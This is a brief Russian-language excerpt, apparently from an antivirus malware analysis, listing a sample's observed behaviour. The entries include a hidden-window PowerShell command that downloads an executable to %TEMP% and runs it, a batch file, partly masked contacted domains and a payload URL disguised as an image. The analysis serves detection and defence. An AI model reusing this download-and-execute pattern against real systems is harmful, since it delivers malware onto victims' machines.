Техническая информация
- $ztre как %temp%\zg-a4.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function iwbountaf0([String] $Ztre){(New-Object System.Net.WebClient).DownloadFile($Ztre,''%TEMP%\zg-a4.exe'');Start-Process ''%TEMP%\zg-a4.exe'';}try{iwbountaf0(''...
- %TEMP%\rdquseuz.bat
- 'tr####ercar24.de':80
- http://tr####ercar24.de/grostor.png
- DNS ASK tr####ercar24.de
- DNS ASK fi####eforautos.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function iwbountaf0([String] $Ztre){(New-Object System.Net.WebClient).DownloadFile($Ztre,''%TEMP%\zg-a4.exe'');Start-Process ''%TEMP%\zg-a4.exe'';}try{iwbountaf0(''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rdquseuz.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rdquseuz.bat" "